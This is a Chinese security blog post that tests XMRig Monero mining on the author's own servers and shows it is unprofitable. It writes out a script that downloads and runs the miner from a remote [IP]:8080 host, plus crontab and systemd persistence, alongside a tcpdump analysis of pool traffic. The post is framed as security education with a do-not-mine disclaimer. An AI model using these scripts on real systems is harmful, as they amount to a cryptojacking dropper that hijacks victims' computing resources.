收手吧,在矿池打工的XMRig

挖矿到底挣不挣钱?我在自己的服务器上测试了,2台菜鸟服务器,跑了一天,预估收益1分钱,收手吧,在矿池打工的XMRig,想要日入100块钱,你要入侵2万台菜鸟服务器,太刑了。

ailx10

2001 次咨询(知乎)

4.9

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

注意:以下代码均为演示程序,无法直接运行,请勿挖矿。

(1)下载挖矿程序

我尝试写一个脚本,实现自动下载并运行挖矿程序

#!/bin/bash

FILE_PATH="/tmp/xmrig"
CONF_PATH="/tmp/config.json"
# 检查文件是否存在,如果不存在则下载
if [ ! -f "$FILE_PATH" ]; then
    MINE_URL="http://[IP]:8080/xmrig"
    CONF_URL="http://[IP]:8080/config.json"
    wget -O "$FILE_PATH" "$MINE_URL"
    wget -O "$CONF_PATH" "$CONF_URL"
    chmod +x "$FILE_PATH"
fi

# 获取 'xmrig' 进程的 PID
PID=$(pgrep -f "$FILE_PATH")

# 如果有进程在运行,杀死它
if [ -n "$PID" ]; then
    kill -15 $PID
    echo "Sent SIGTERM to process with PID: $PID at $(date)"
fi

# 等待一段时间让进程优雅地关闭
sleep 5

# 重新启动 'xmrig'
"$FILE_PATH" &
echo "Restarted process at $(date)"

(2)模拟挖矿动作

挖矿需要矿池、矿工、钱包,参数-o指定矿池,-u指定钱包,-p指定矿工

./xmrig -o pool.supportxmr.com:5555 -u <钱包地址> -p x

可以看到我的2个矿工X、Y都在帮我挖矿了,CPU都 200% 了

运行了12个小时,一共挖到 0.00000466 门罗币,折合人民币0.00549元,预估一天赚1分钱,不够付电费

(3)添加计划任务

定时执行,每5分钟,运行一次,防止挖矿程序被删除

crontab -l | { cat; echo "*/5 * * * * sh /root/XMRig/1.sh"; } | crontab -

(4)添加启动项

重启机器,自动运行挖矿程序

#!/bin/bash

# 定义服务名称和脚本路径
service_name="xmrig"
script_path="/tmp/xmrig"

# 创建 systemd 服务文件
cat <<EOF | sudo tee /etc/systemd/system/${service_name}.service
[Unit]
Description=XMRig Mining Script
After=network.target

[Service]
Type=simple
ExecStart=${script_path} &
Restart=always
RestartSec=10s
User=root
WorkingDirectory=/tmp

[Install]
WantedBy=multi-user.target
EOF

# 重新载入 systemd 配置
sudo systemctl daemon-reload

# 启用并启动服务
sudo systemctl enable ${service_name}.service
sudo systemctl start ${service_name}.service

# 输出状态信息
echo "XMRig service has been enabled and started on boot."

(5)安全分析,流量抓捕

下面是tcpdump 抓到的一个会话流,红色的是矿工认证,蓝色的是矿池分配给矿工的任务

sudo tcpdump -i any -nn host pool.supportxmr.com and port 5555 -w traffic.pcap

矿工认证(服务器向矿池发送TCP请求):

{
"id": 1,
"jsonrpc": "2.0",
"method": "login",
"params": {
  "login": "钱包地址",
  "pass": "x",
  "agent": "XMRig/6.21.3 (Linux x86_64) libuv/1.48.0 gcc/13.2.1",
  "algo": ["cn/1", "cn/2", "cn/r", "cn/fast", "cn/half", "cn/xao", "cn/rto", "cn/rwz", "cn/zls", "cn/double", "cn/ccx", "cn-lite/1", "cn-heavy/0", "cn-heavy/tube", "cn-heavy/xhv", "cn-pico", "cn-pico/tlo", "cn/upx2", "rx/0", "rx/wow", "rx/arq", "rx/graft", "rx/sfx", "rx/keva", "argon2/chukwa", "argon2/chukwav2", "argon2/ninja", "ghostrider"]
}
}

分配任务(矿池向服务器发送TCP请求):

{
"jsonrpc": "2.0",
"method": "job",
"params": {
  "blob": "10108be0d0b506b5bf6dd24bd3a3dd1a76d7d7020dc90a68932c6765882ee07fcf3278425982b5000000005b9e44622c3a309cf0a19551dd2488cb2ef25c86ce4c334c054fef9bd2a0ecdb14",
  "job_id": "BXYBH3Hz0N8MmwxGii2Ko6i4ltFC",
  "target": "c5a70000",
  "id": "f5b9524a-1ca9-4b89-ab1d-34d2067f2996",
  "height": 3210369,
  "seed_hash": "a0d0e7cf03f3f4290d8957b90d7210304e6086bedfbf633ad38bccada6b95cab",
  "algo": "rx/0"
}
}

挖矿结果(服务器向矿池发送TCP请求):

{
"id": 2,
"jsonrpc": "2.0",
"method": "submit",
"params": {
  "id": "e5333063-9d24-4077-bc8d-f53a6e4923f1",
  "job_id": "yoCi1WQ+uB0r+YfXWE94EiHGaLva",
  "nonce": "13000100",
  "result": "6c3ac64bfefbbaf3f05dcf82acd404984fca0a2cba7b5308723848c9188f0000"
}
}

已开启送礼物

所属专栏 · 18 小时前 更新​编辑

信息安全入门

​编辑

ailx10

网络安全话题下的优秀答主

最热内容 ·

零基础学习网络安全这一块,请问有哪些相关资料可以推荐一下?

编辑于 2024-08-13 17:03・北京

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ailx10

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值